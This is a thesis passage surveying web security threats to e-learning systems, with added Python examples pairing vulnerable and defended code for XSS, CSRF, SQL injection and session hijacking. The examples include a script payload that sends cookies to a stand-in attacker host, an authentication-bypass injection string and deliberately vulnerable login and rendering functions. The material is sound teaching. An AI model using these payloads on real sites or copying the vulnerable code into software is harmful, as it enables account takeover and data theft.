
Security issues common to e-learning and m-learning systems

In document Mobile learning security in Nigeria (Page 51-54)

2.3 Overview of Security Issues in E-learning and M-learning

2.3.1 Security issues common to e-learning and m-learning systems

Cross Site Scripting (XSS) is one of the most common application-layer security issues affecting web pages. XSS arises when a web application writes untrusted input into an HTML page without adequate encoding, so that attacker-supplied markup or JavaScript is interpreted by the victim's browser as a legitimate part of the page. XSS normally targets scripts embedded in a page, which are executed on the client side. The concept of XSS is to manipulate the client-side scripts of a web application so that they execute in the manner desired by the malicious user. Such a manipulation can embed a script in a page that is executed every time the page is loaded (stored XSS), when a crafted link is followed (reflected XSS), or whenever an associated event is performed. An XSS attack can be used to achieve the following malicious results: access to sensitive information such as session cookies, identity theft by impersonating the victim, and alteration of browser functionality or page content. XSS threats can be reduced by validating untrusted input and escaping it for the HTML context in which it is output, marking session cookies HttpOnly so that scripts cannot read them, deploying a Content Security Policy, using JavaScript sandbox tools, and using templating libraries that auto-escape output (Hydara et al. 2015).
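The following is an added example, not code from the thesis or from any learning platform it describes, showing the two renderings of a profile page described above: one that reflects an attacker-registered display name straight into the HTML body, and one that entity-encodes it and accompanies it with a Content Security Policy. The payload, the host attacker.example and the nonce value are constructed for the illustration.

```python
import html

# Constructed sample input: a display name an attacker registers in a learning
# portal profile. The payload sends the victim's cookies to a hypothetical
# attacker-controlled host.
MALICIOUS_NAME = ('<script>new Image().src="https://attacker.example/c?"'
                  '+document.cookie</script>')


def render_vulnerable(name: str) -> str:
    """Reflects the untrusted value straight into the HTML body (the XSS bug)."""
    return f"<p>Welcome back, {name}</p>"


def render_escaped(name: str) -> str:
    """Same page, with the untrusted value entity-encoded for an HTML body context.

    html.escape(quote=True) rewrites & < > " ' so the browser displays the text
    instead of parsing it as markup. Attribute, URL and JavaScript contexts need
    their own encoders; body-text escaping alone is not sufficient there.
    """
    return f"<p>Welcome back, {html.escape(name, quote=True)}</p>"


def contains_script_tag(rendered: str) -> bool:
    """Crude check used here only to show that the two renderings differ."""
    return "<script" in rendered.lower()


def csp_header(nonce: str) -> str:
    """Content-Security-Policy value that permits only same-origin scripts
    carrying the per-response nonce, so an injected inline <script> does not
    execute even where escaping was missed. The nonce must be freshly random
    for every response."""
    return (f"default-src 'self'; script-src 'self' 'nonce-{nonce}'; "
            "object-src 'none'; base-uri 'none'")


if __name__ == "__main__":
    print(render_vulnerable(MALICIOUS_NAME))   # browser would run the script
    print(render_escaped(MALICIOUS_NAME))      # browser shows it as text
    print("Content-Security-Policy:", csp_header("c29tZS1yYW5kb20"))
```

Escaping is per output context: the same value placed inside a `href` attribute or a `<script>` block needs URL or JavaScript encoding respectively, which is why auto-escaping template engines and a CSP are recommended alongside manual escaping.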

Cross Site Request Forgery (CSRF) is an attack that tricks the user into loading a page that contains a malicious request. It is malicious in the sense that it inherits the identity and privileges of the victim to perform an undesired action on their behalf, such as changing a student's record: e-mail address, home address, password or even grades. CSRF attacks generally target functions that cause a state change on the server but can also be used to access sensitive data (Luminita and Magdalena, 2012). For most sites, browsers will automatically include with such requests any credentials associated with the site, such as the user's session cookie, HTTP basic authentication credentials or Windows domain credentials; where the site trusts the client's IP address, that is inherited as well. Therefore, if the user is currently authenticated to the site, the site has no way to distinguish the forged request from a legitimate one. CSRF prevention techniques work by embedding additional unpredictable data into state-changing requests, for example an anti-CSRF token bound to the session, which the web application checks so that requests originating from another site, which cannot know the token, are rejected; setting the SameSite attribute on the session cookie adds a further layer of defence.
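The following is an added example, not code from the thesis, of the synchronizer-token defence just described applied to the "change e-mail address" function. The session dictionaries, student record, and the attacker address are constructed stand-ins for a real server's session store and database; `change_email` plays the role of the POST handler.

```python
import hmac
import secrets
from typing import Dict, Optional, Tuple

# Constructed victim state: a logged-in student whose browser holds a valid
# session cookie. The dicts stand in for the server-side session store and the
# student record table.
VICTIM_SESSION: Dict[str, str] = {"user": "student42"}
STUDENT_RECORDS: Dict[str, Dict[str, str]] = {
    "student42": {"email": "student42@university.example"}
}


def issue_csrf_token(session: Dict[str, str]) -> str:
    """Synchronizer token pattern: mint an unpredictable per-session token and
    keep it server-side. The site's own form embeds it in a hidden field; a
    page on another origin cannot read it because of the same-origin policy."""
    token = secrets.token_urlsafe(32)
    session["csrf_token"] = token
    return token


def csrf_token_valid(session: Dict[str, str], submitted: Optional[str]) -> bool:
    """Constant-time comparison of the submitted token with the stored one."""
    expected = session.get("csrf_token")
    if not expected or not submitted:
        return False
    return hmac.compare_digest(expected, submitted)


def change_email(session: Dict[str, str], form: Dict[str, str],
                 records: Dict[str, Dict[str, str]], enforce_csrf: bool) -> Tuple[int, str]:
    """POST /profile/email handler. The browser attached the session cookie, so
    `session` belongs to the victim no matter which page issued the request.
    Returns (HTTP status, e-mail now on record)."""
    user = session["user"]
    if enforce_csrf and not csrf_token_valid(session, form.get("csrf_token")):
        return 403, records[user]["email"]
    records[user]["email"] = form["email"]
    return 200, records[user]["email"]


def run_scenario(enforce_csrf: bool) -> Tuple[int, str, int, str]:
    """Replays a forged request followed by a legitimate one against fresh copies
    of the victim's session and record."""
    session = dict(VICTIM_SESSION)
    records = {u: dict(r) for u, r in STUDENT_RECORDS.items()}
    token = issue_csrf_token(session)
    # Forged request from the attacker's page: it controls the form fields but
    # has no way to learn the victim's token.
    forged = {"email": "attacker@evil.example"}
    forged_status, email_after_forgery = change_email(session, forged, records, enforce_csrf)
    # Legitimate submission from the site's own form, which carried the token.
    legit = {"email": "new.address@university.example", "csrf_token": token}
    legit_status, email_after_legit = change_email(session, legit, records, enforce_csrf)
    return forged_status, email_after_forgery, legit_status, email_after_legit


if __name__ == "__main__":
    print("no CSRF check :", run_scenario(enforce_csrf=False))
    print("with CSRF check:", run_scenario(enforce_csrf=True))
```

Without the check the forged request silently rewrites the record; with it the forgery receives 403 while the genuine form submission still succeeds. In a real deployment the token check sits in front of every state-changing route, and the session cookie additionally carries `SameSite=Lax` or `Strict` so that cross-site navigations do not send it at all.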

SQL Code Injection occurs when an application builds a database query by concatenating user-controlled input, including values taken from the site address (URL parameters), directly into the SQL text. Using this method, an attacker passes specially crafted string input to the application in the hope of gaining unauthorised access to the database. The attacker enters SQL fragments or metacharacters into form fields or URL parameters so that the query performs an unexpected action, which can act in a malicious way. Such queries may read unauthorised data (for example, usernames and password hashes that can then be cracked offline), bypass authentication, or shut down a database, whether the database resides on the web server or on a separate server. SQL injection can be avoided with strict adherence to some basic security practices. Some of the methods to prevent this kind of vulnerability are: using prepared (parameterised) statements, which tell the database exactly what to expect before any user-provided data is passed to it, so that the data can never be interpreted as SQL; validating user input and treating dangerous characters such as single quotes with suspicion, although character filtering alone is easily bypassed and is only a defence-in-depth measure; hashing or encrypting sensitive data so that a successful extraction yields little of value; and ensuring that error messages give nothing away about the internal architecture of the application or the database.
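The following is an added example, not code from the thesis, contrasting an authentication-bypass injection against a login query built by string formatting with the same lookup written as a prepared statement, and wrapping the lookup so that database errors are not echoed to the user. It uses Python's built-in sqlite3 module with an in-memory table of two constructed accounts; the account names, passwords and the unsalted SHA-256 hash are assumptions made to keep the example short.

```python
import hashlib
import sqlite3
from typing import Optional


def hash_pw(password: str) -> str:
    # Unsalted SHA-256 keeps the example short; a real system should store a
    # salted, slow hash (argon2, bcrypt or PBKDF2) so dumped hashes resist cracking.
    return hashlib.sha256(password.encode()).hexdigest()


def setup_db() -> sqlite3.Connection:
    """In-memory table with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE students (id INTEGER PRIMARY KEY, "
                 "username TEXT UNIQUE, password_hash TEXT)")
    for uid, name, pw in [(1, "tutor01", "Correct-Horse"), (2, "student42", "ilovebooks")]:
        conn.execute("INSERT INTO students VALUES (?, ?, ?)", (uid, name, hash_pw(pw)))
    conn.commit()
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> Optional[int]:
    """Builds the query by string formatting, so the username becomes part of the SQL."""
    query = (f"SELECT id FROM students WHERE username = '{username}' "
             f"AND password_hash = '{hash_pw(password)}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> Optional[int]:
    """Prepared statement: the driver passes SQL and data separately, so the quote
    and comment characters in the username are just bytes inside a string value."""
    row = conn.execute(
        "SELECT id FROM students WHERE username = ? AND password_hash = ?",
        (username, hash_pw(password)),
    ).fetchone()
    return row[0] if row else None


def login_safe_guarded(conn: sqlite3.Connection, username: str, password: str) -> str:
    """Same lookup, with database errors reduced to a generic message so the
    response reveals nothing about the schema or engine."""
    try:
        uid = login_safe(conn, username, password)
    except sqlite3.Error:
        return "login failed"
    return "login failed" if uid is None else f"logged in as {uid}"


# Constructed attacker input: closes the quoted string and comments out the rest,
# so the vulnerable query becomes
#   SELECT id FROM students WHERE username = 'tutor01' --' AND password_hash = '...'
INJECTED_USERNAME = "tutor01' --"

if __name__ == "__main__":
    db = setup_db()
    print("vulnerable:", login_vulnerable(db, INJECTED_USERNAME, "wrong"))  # tutor01's id
    print("prepared  :", login_safe(db, INJECTED_USERNAME, "wrong"))        # None
    print("guarded   :", login_safe_guarded(db, INJECTED_USERNAME, "wrong"))
```

The injected username logs the attacker in as tutor01 without a password against the formatted query, because the `--` turns the password comparison into a comment. The parameterised version looks for a user literally named `tutor01' --`, finds none, and fails closed.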

A stack-smashing attack is a type of buffer overflow attack that targets a specific programming fault: inappropriate use of data buffers allocated on the program's run-time stack, next to local variables, saved return addresses and function arguments. A stack-smashing attack is a serious problem, since an innocuous service (such as a web server or FTP server) can be made to execute arbitrary commands. The idea is straightforward: place some attack code (for example, code that invokes a shell) somewhere in memory and overwrite the stack, in particular the saved return address, in such a way that control is passed to the attack code when the function returns (Peltier, 2013). It can be avoided by using a language or compiler that performs automatic bounds checking, and by enabling protections that attempt to detect or frustrate these attacks, such as stack canaries, non-executable stacks and address space layout randomisation.


Session Hijacking is the exploitation of a valid computer session, sometimes called a session key, to gain unauthorised access to information or services. Web sessions work by giving the browser a unique session id, either in the form of a cookie or a URL parameter, which the browser submits with every new request; the session remains active as long as the browser keeps sending the session id, and whoever presents a valid id is treated as that user. The attack is possible when the session id is predictable: generated without enough randomness, too short, or assigned sequentially. Sessions that do not expire on the HTTP server can allow an attacker unlimited time to guess or brute-force a valid authenticated session id and eventually gain access to that user's web accounts. Additionally, a session id can be logged and cached in proxy servers, and when transmitted via a URL parameter it can be stored in the browser history, cache and bookmarks and leaked through the Referer header, where it remains easily viewable afterwards. Methods to prevent session hijacking include carrying the session only over HTTPS, marking the cookie Secure and HttpOnly, generating ids with a cryptographically secure random number generator, issuing a fresh id on login, and expiring idle sessions (Peltier, 2013).
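The following is an added example, not code from the thesis, that makes the two weaknesses above concrete: a sequential id generator that lets an attacker who has observed their own id derive the victim's, against a generator backed by the operating system's CSPRNG; a session store with an idle timeout; and the cookie attributes that keep the id off URLs and away from scripts. The user names, timeout and timestamps are constructed for the illustration.

```python
import secrets
from typing import Dict, Optional, Tuple


class SessionStore:
    """Server-side session table: session id -> (user, last_seen).
    The clock is passed in explicitly so the idle-timeout logic is testable."""

    def __init__(self, idle_timeout_s: int):
        self.idle_timeout_s = idle_timeout_s
        self._sessions: Dict[str, Tuple[str, float]] = {}

    def create(self, user: str, sid: str, now: float) -> str:
        self._sessions[sid] = (user, now)
        return sid

    def lookup(self, sid: str, now: float) -> Optional[str]:
        """Returns the user for a live session, or None; idle sessions are purged
        on first use after the timeout, so a guessed id cannot stay valid forever."""
        entry = self._sessions.get(sid)
        if entry is None:
            return None
        user, last_seen = entry
        if now - last_seen > self.idle_timeout_s:
            del self._sessions[sid]
            return None
        self._sessions[sid] = (user, now)
        return user


class SequentialIds:
    """Weak generator: ids are a counter, so seeing your own id reveals the next."""

    def __init__(self, start: int = 1000):
        self._next = start

    def new(self) -> str:
        self._next += 1
        return str(self._next)


def random_id() -> str:
    """256 bits from the OS CSPRNG (43 URL-safe characters); infeasible to enumerate."""
    return secrets.token_urlsafe(32)


def guess_next(observed_sid: str) -> Optional[str]:
    """Attacker heuristic against sequential ids; gives up on non-numeric ids."""
    return str(int(observed_sid) + 1) if observed_sid.isdigit() else None


def session_cookie(sid: str, max_age: int) -> str:
    """Set-Cookie value: Secure keeps it off plain HTTP, HttpOnly keeps it away
    from document.cookie, and carrying it as a cookie rather than a URL parameter
    keeps it out of history, bookmarks and Referer headers."""
    return f"SESSIONID={sid}; Path=/; Max-Age={max_age}; Secure; HttpOnly; SameSite=Lax"


def hijack_attempt(use_random: bool, now: float = 1_000.0) -> Optional[str]:
    """Attacker logs in first, observes their own id, then presents a guess for
    the victim's. Returns the user the server would treat the attacker as."""
    store = SessionStore(idle_timeout_s=900)
    seq = SequentialIds()
    attacker_sid = store.create("attacker", random_id() if use_random else seq.new(), now)
    store.create("student42", random_id() if use_random else seq.new(), now)
    guess = guess_next(attacker_sid)
    return store.lookup(guess, now) if guess else None


def expiry_demo() -> Tuple[Optional[str], Optional[str]]:
    """A request inside the idle window succeeds; one 901 s after the last
    activity finds the session gone."""
    store = SessionStore(idle_timeout_s=900)
    sid = store.create("student42", random_id(), now=0.0)
    return store.lookup(sid, now=800.0), store.lookup(sid, now=800.0 + 901.0)


if __name__ == "__main__":
    print("sequential ids, attacker seen as:", hijack_attempt(use_random=False))
    print("random ids, attacker seen as    :", hijack_attempt(use_random=True))
    print("expiry:", expiry_demo())
    print(session_cookie(random_id(), max_age=900))
```

With a counter the attacker is served the victim's session on the first guess; with 256-bit random ids there is nothing to increment and a brute-force search is hopeless, and the idle timeout bounds how long any leaked or guessed id stays usable.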

Denial-of-Service (DoS) attacks render a service or device unusable for its legitimate users by denying availability. A successful attack will shut down or dramatically limit the operation of the target, thereby depriving users of a resource they would normally expect to have. In a wireless network the attack may aim at the complete disruption of routing information, which consequently affects the operation of the whole network; more generally, it affects the availability of a computer system. Such attacks can exploit different functionalities, like CPU-intensive tasks that consume a lot of energy, which on battery-powered mobile devices also drains the battery. DoS attacks can be countered with prevention techniques such as protocol traceback on the servers (Tupakula and Varadharajan, 2013) and reverse proxies spread across multiple hosting locations that absorb and filter the attack traffic before it reaches the learning platform.

It should be noted that these security issues are general ones that are not specific to e-learning and m-learning applications and database systems; they are normally found in any three-tier system (client, application server and database). Since learning systems are production systems for educational institutions, security becomes a fundamental requirement. As ubiquitous learning platforms increase in demand and popularity, the need to improve their security also increases and is inevitable (Zafar et al., 2014).

2.3.2 Security issues in e-learning and m-learning (Client level)
